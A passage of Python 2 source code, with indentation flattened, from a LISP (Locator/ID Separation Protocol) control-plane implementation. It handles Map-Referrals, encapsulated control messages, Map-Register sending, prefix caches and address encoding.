lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if arrived Map-Referral EID-prefix is more-specific than the
# last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
# Process each EID record in Map-Reply message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
# Check for Map-Referral looping. If there is no loop cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
# Set dirty-bit so we can remove referral-nodes from cached entry
# that wasn't in packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (referral.referral_set.has_key(addr_str) == False):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (dirty_set.has_key(addr_str)): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authenticaiton for Map-Register message and sent to supplied
# Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
# a Map-Server, we can't join the group by using the group so we have to
# send to the loopback address to bootstrap our membership. We join to
# one other member of the peer-group so we can get the group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use 16-byte key which is
# 32 string characters.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send LISP control packet that is to be source from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
# For sending Map-Requests, if the NAT-traversal configured, use same
# socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associatative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries():
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache():
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False):
self.cache[ml] = lisp_cache_entries()
self.cache[ml].entries = {}
self.cache[ml].entries_sorted = []
self.cache_sorted = sorted(self.cache)
#endif
if (self.cache[ml].entries.has_key(key) == False):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
self.cache[ml].entries_sorted = sorted(self.cache[ml].entries)
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (self.cache.has_key(ml_key) == False): return(None)
if (self.cache[ml_key].entries.has_key(key) == False): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry_key in self.cache[ml].entries_sorted:
entries = self.cache[ml].entries
if (entry_key in entries):
entry = entries[entry_key]
if (entry == None): continue
if (prefix.is_more_specific(entry.eid)): found = entry
#endif
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False): return
if (self.cache[ml].entries.has_key(key) == False): return
self.cache[ml].entries.pop(key)
self.cache[ml].entries_sorted.remove(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
# more-specifics, this entry will not be retunred if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
# not find 2.2.2.2, what is retunred is 224.1.1.1/32 and not 224.0.0.0/4.
#
# So we will look at the retunred entry and if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 matches the group
# we are looking up. This, of course, is only done for longest match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a python parcularity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address():
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because when "L" is used,
# it was producing 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = ""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += self.address + "\0"
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte with zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There will be a common IPv6 address input mistake that will
# occur. The address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
# Allow user to specify ff::/8 which allows for placing the the
# byte in the high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
